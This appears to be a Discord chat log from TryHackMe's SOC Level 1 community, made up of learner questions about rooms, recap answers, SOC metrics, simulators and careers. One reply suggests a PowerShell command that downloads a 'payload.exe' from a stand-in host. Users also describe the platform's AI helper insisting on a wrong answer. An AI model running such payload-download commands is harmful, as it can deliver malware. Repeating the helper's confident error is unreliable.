Hello everyone. I have a quick question regarding SOC L1. Do I need a business plan in order to finish the learning path? I'm asking because of the SOC Scenarios. Thanks.
No.
Thank you very much
I passed my sec+. Any advice on what to do next?
Nice! What materials did you use as study guides?
Yippeeeee
I used mainly Messer's videos and Jason Dion's practice exams
Gratz
Hi everyone, please, is tryhackme loading? I have not been able to login
Works fine for me
Congrats
@Malware Concepts for SOC Recap
Am I missing something?
It seems those Echo recaps are sometimes too literal and not flexible enough to accept a valid answer.
I haven't done that one but try commands with the powershell command itself like powershell -c "Invoke-WebRequest http://example.com/payload.exe" -OutFile C:\temp\payload.exe or a wget maybe.
Didn't work
I'm stuck on this recap question
Reorder the steps to search for and examine a specific file in a Linux system:
Use find to locate the specific file by name
Navigate to the target directory using cd
Use ls to list the contents of the current directory
Display the file contents using cat
Was a Splunk room removed from the SOC tier 1 path? I only see Splunk Basics now; I remember there was another one, if I am not mistaken.
in SIEM Triage for SOC module there is an "Alert Triage with Splunk" room
Oh yeah, that's exactly what I was looking for, thanks!
Gave +1 Rep to @tight sage (current: #3680 - 1)
I tried a lot of orders; it's always giving "wrong answer". Could I please get some help?
Rooms are buggy, I think.
Can someone help me with why showmount is not working here:
I think it is the new attackbox that is buggy, not the room (tho I might be mistaken).
It's just like its (default) ping which does not work, I had to find the "real" binary to make it work.
I suggest you try the same with something like find / -name showmount 2>/dev/null
Tomorrow the capstone one, and then finally done with these hard rooms.
Hey guys, why can't I do the SOC Simulator? I'm premium.
So do points earned from simulators not count towards league points, for example the "Phishing Unfolding" simulator?
Good day everyone, I am a beginner and an aspiring SOC analyst from the Philippines. Just wondering if I can have your insights and tips or any helpful learnings on how I can efficiently absorb and learn through the TryHackMe platform. Big thanks.
Are you enrolled in a team or not yet? btw
To become a good SOC analyst you will have to think in parallel. I mean by this that you will have to know the tactics of the attacker well. If you don't know the attacker's pattern, what will you defend and protect? The attacker will easily bypass.
- Along with THM we have many sources; depending on 1 resource will be a problem af, because the benefit of THM is it's beginner friendly, but after some time it's spoon-feeding.
So you will have to work in more places like Linux, OverTheWire; there are many places where you can practice.
I have a subscription to THM, currently learning whenever I have free time after work.
alr, got any doubts? I have muted all servers so I ain't got ya reply
That would be all, sir. It's just overwhelming since there is a lot of information and it feels like endless learning, which really is the reality in cybersecurity. I think being curious and passionate about this field would be beneficial, and I'll make my own journey and practice it most of the time. Thanks for your time and valuable insight. Have a great one!
Hello guys
Hey guys, I was just wondering if, during some SOC simulations, there is a way of copying some text from the alert queue and pasting it inside the Analyst VM?
Thanks. Feel free to ask if you get stuck somewhere
Gave +1 Rep to @hardy perch (current: #3702 - 1)
or somewhat guidance
idk about what you're doing, but I know highlight and Ctrl+C usually works for me, then Ctrl+V to paste
I'm not able to do that...
Hi folks, I've been feeling really disheartened as I completed most of the SOC Level 1 path but struggle on some portions of the challenges like Tempest and Boogeyman 1. Is it normal to struggle with some questions on these even after completing the path?
Yeah, I really struggled with Tempest. Not too sure why it's in SOC1; not a lot of the tactics needed were covered in the path. Boogeyman 1-3 are quite a bit better, with 1 (in my opinion) being the more challenging of the 3.
I'm on the last few questions on Boogeyman 3
Good to hear, because Tempest was definitely challenging. Boogeyman 1 was still challenging but better, and I just did Boogeyman 2 and felt way better on that one.
I meant Boogeyman 3
I was up too late and did not see my typo
Hey guys, I'm on the SOC L1 path and I do not understand one thing. I'm on SOC Metrics and Objectives and I have this task:
`Imagine a scenario where an employee was lured into running data stealer malware.
- The SOC team received the "Connection to Redline Stealer C2" alert after 12 minutes.
- One of the L1 analysts on shift moved the alert to In Progress 10 minutes later.
- After 6 minutes, the alert was escalated to L2, who spent 35 minutes cleaning the malware.
Provide the MTTD, MTTA, and MTTR via comma as your answer (e.g. 10,20,30).`
I could not come up with the proper answer because I was inputting || 12,10,41 ||
I even asked Echo like 10 times and he still insisted I am correct and it is || 12,10,41 ||
But it seems the answer is || 12,10,51 ||. Why is that?
Echo does not agree with that and claims this is an error in the exercise lol, but I doubt that's the case
Echo is wrong. MTTR (Mean Time to Respond) is the time taken by SOC to actually stop the breach from spreading. In this scenario, ||L1 took 10 minutes of analysis to conclude to change the alert's status to In Progress instead of closing it as false positive (that is valuable time taken against the malware, without it there is no L2) . Then L1 took 6 more minutes to document the findings and assign it to L2 who then took 35 minutes to fix it. So 10+6+35=51||
Hey
hope you guys are doing okay
please suggest me some rooms that teach how to report incidents to L2 and how to properly conduct initial triage
thanks a lot, that makes sense
Gave +1 Rep to @orchid aurora (current: #286 - 37)
OK, I legit can't with Boogeyman 3.... A lot of the stuff in it was NEVER covered in the SOC1 path.
What I've been really stuck on is "Share enumeration"
Done!
For a jr SOC analyst, is a remote job possible?
@crystal shadow Yes, it should be. Large SOCs try to have 24/7 coverage. Often remote work helps to make it easier to have that coverage.
Same here, I have been struggling with the Tempest and Boogeyman part
The Tempest on the SOC 1 level path: I have been on it for a week and still haven't completed the room
Try the SOC 1 level path; at the beginning of the room you will learn about escalation
Thanks
Gave +1 Rep to @tawny sphinx (current: #3714 - 1)
Are there any written resources for this path, so I can revise?
Evening guys, any senior SOC analyst here?
Hello guys, I wanted to know when we should escalate the alert in the SOC sim and in general, because sometimes I feel like it's not necessary but the feedback tells me that I should've done it
In The Greenholt Phish room - is the lab machine supposed to have network access? Some of the questions ask you to check SPF and WHOIs records and I can't connect to anything either in Firefox or from the command line.
You can make them yourself and it will be of benefit to you
Hello guys, I want to ask about this task. When I answer "computer internet",
the system rejects my answer with "Uh-oh! The answer you provided may not be in English. Please review it and try again."
Am I wrong, or am I mistaken about my answer?
Your answer Computers and Internet would be right but the task seems outdated as Talos seems to have updated the category for this domain. The expected answer is ||Computer Security|| which is still a valid category at Talos https://talosintelligence.com/categories .
Hey! Did THM remove the BlackCat and Upload and Conquer rooms from the SOC Level 1 path recently? I was planning on doing them this week but couldn't find them
thx sir
Gave +1 Rep to @orchid aurora (current: #263 - 42)
Those are SOC simulators and not rooms
Cheers @worthy tide , apologies for the misuse of the word. I was mainly wondering why access to those sims seems to have disappeared from the SOC Level 1 path when they were accessible before. I even found this Medium article from Aug 2025 showing BlackCat as part of the path
Those are only available for business subscribers and them being in the path caused some problems, hence they were removed
Ahh gotcha, cheers for clarifying mate! Bit of a shame though, wish those were included too. Ah well, it is what it is
Have a great weekend and thanks for answering!
Gave +1 Rep to @worthy tide (current: #44 - 269)
I can't solve this question. I got the answer using CyberChef, but now I don't know why it's not taking the correct answer. Can anyone help me?
Assuming you already solved this, as it just says you are going too fast. I have that as well when I change a typo in the answer
Will skipping some rooms in the learning path still get a certificate?
I mean, in every learning path it shows some rooms as "pay premium" and some rooms as free. How will I get the certificate?
You pay for a pretty cheap subscription
Are there any good resources for cheat sheets that list things like Wireshark filters, Splunk searches, etc.? I get all the concepts, but hate taking all the notes lol.
The Wireshark Packet Operations VM is really slow for some reason. Been like that for the last 3 days...
Are you supposed to use the websites just by looking them up in your own browser (not a VM) in this SOC L1 path?
In Pre-Security you just used the sources that were given
Network Security Essentials room. I can't open Splunk; I tried localhost:8000 but am unable to connect. What to do?
nvm managed to solve it
I like the SOC Analyst Path but I will admit that the Windows Security module is the most painful thing I've done so far
Purely because Event Viewer keeps freezing
Do you also use tools that aren't taught by TryHackMe?